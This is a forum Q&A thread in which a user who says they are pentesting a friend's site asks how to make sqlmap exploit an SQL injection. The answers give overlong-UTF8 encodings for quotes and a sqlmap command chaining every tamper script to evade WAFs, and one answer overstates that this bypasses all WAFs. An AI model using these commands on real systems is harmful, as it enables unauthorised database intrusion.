2

I'm currently pentesting my friends website. I found an SQL injection with acunetix' help:

- URL encoded GET input for was set to 1#####
Error message found: 
supplied argument is not a valid MySQL result

So I tried running a normal sqlmap:

./sqlmap.py -u "http://www.example.com/ajax.php?div=content&for=1*&page=1&sort=4&show=1&what=topic" --threads=25

Output:

[11:16:31] [WARNING] URI parameter '#1*' is not injectable [11:16:31] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')

So I need a way to include those #'s (for=1%00%c0%a7%c0%a2) Tried --string and --suffix but didn't do the job. Maybe there's a tamper for this?

h4ckNinja
  • 3,006
  • 15
  • 24
nickvl
  • 21
  • 2
  • I don't understand how you know this is vulnerable to SQL injection, have you tested it manually? In my experience, it is better to do it manually to rely on a tool completely. Could you give more information about vulnerable parameter to determine what sqlmap options are appropiated for this? – hmrojas.p Sep 06 '16 at 01:57

2 Answers2

1

These characters are Overlong-UTF8: ' = %27 = %c0%a7 = %e0%80%a7 = %f0%80%80%a7 " = %22 = %c0%a2 = %e0%80%a2 = %f0%80%80%a2 < = %3c = %c0%bc = %e0%80%bc = %f0%80%80%bc ; = %3b = %c0%bb = %e0%80%bb = %f0%80%80%bb & = %26 = %c0%a6 = %e0%80%a6 = %f0%80%80%a6 \0= % 00 = %c0%80 = %e0%80%80 = %f0%80%80%80

If you are using SQLMAP you can use --tamper=overlongutf8 to exploit the vulnerability.

lmiller
  • 11
  • 1
1

There is one more way that you can use all of tampers in one line like so:

./sqlmap.py -u "http://www.example.com/ajax.php?div=content&for=1*&page=1&sort=4&show=1&what=topic" --threads=25 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

By using this, you can pass over all of WAFs.

Oya Ü.
  • 31
  • 1